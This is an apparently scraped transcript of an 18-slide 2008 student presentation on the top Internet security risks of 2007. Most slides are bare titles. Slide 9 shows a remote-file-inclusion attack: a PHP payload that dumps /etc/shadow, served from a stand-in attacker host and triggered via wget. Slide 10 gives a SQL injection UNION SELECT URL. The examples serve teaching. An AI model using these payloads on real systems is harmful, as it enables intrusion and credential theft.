internet security

18
Yohann Lepage – Vincent Palierne Top-10 2007 Security Risks Wednesday 6th May 2008 INTERNET SECURITY

Upload: 2xyo

Post on 12-May-2015

1.842 views

Category:

Technology


1 download

DESCRIPTION

Presentation in english for first year at the institute of technology of Saint-Malo : Top-10 2007 Security Risks

TRANSCRIPT

Page 1: Internet Security

Yohann Lepage – Vincent Palierne

Top-10 2007 Security Risks

Wednesday 6th May 2008

INTERNET SECURITY

Page 2: Internet Security

Summary

Page 3: Internet Security

Client-side Vulnerabilities

ServerClient

Network(Internet)

Vulnerabilities

Softwares

Page 4: Internet Security

Web Browsers

Page 5: Internet Security

Email Clients

Page 6: Internet Security

Media Players

Page 7: Internet Security

Clients-Side Vulnerabilities

Page 8: Internet Security

Server-Side Vulnerabilities

ServerClient

Network(Internet)

Vulnerabilities

Page 9: Internet Security

Web Applications

Hacker www.mysite.com/index.php

<?php

include($page.'.php');

?>

Index.php

<?php passthru("cat /etc/shadow"); ?>

cat.php

www.badguy.ru/cat.php

$>wget www.mysite.com/index.php?page=www.haxor.com/cat Network

(Internet)

USER:PASSWORDroot:S5AçéZl~]Linus:@ée)&#$*^%Httpd:Jpzi5z@°

Www.mysite.com/indexindex.php

Vulnerabilities

Page 10: Internet Security

Database Software

http://localhost/admin.php?module=news&id= -1 union select 0,1,database(),3,4,5,6,7 from membres--

Page 11: Internet Security

Security Policy and Personal

Page 12: Internet Security

Phishing/Spear Phishing

Page 13: Internet Security

Application Abuse

Page 14: Internet Security

Instant Messaging

I MI M

Page 15: Internet Security

Peer-to-Peer Programs

Page 16: Internet Security

Zero Day Attacks

Page 17: Internet Security

Conclusion

Internet security is hard because :

Page 18: Internet Security

End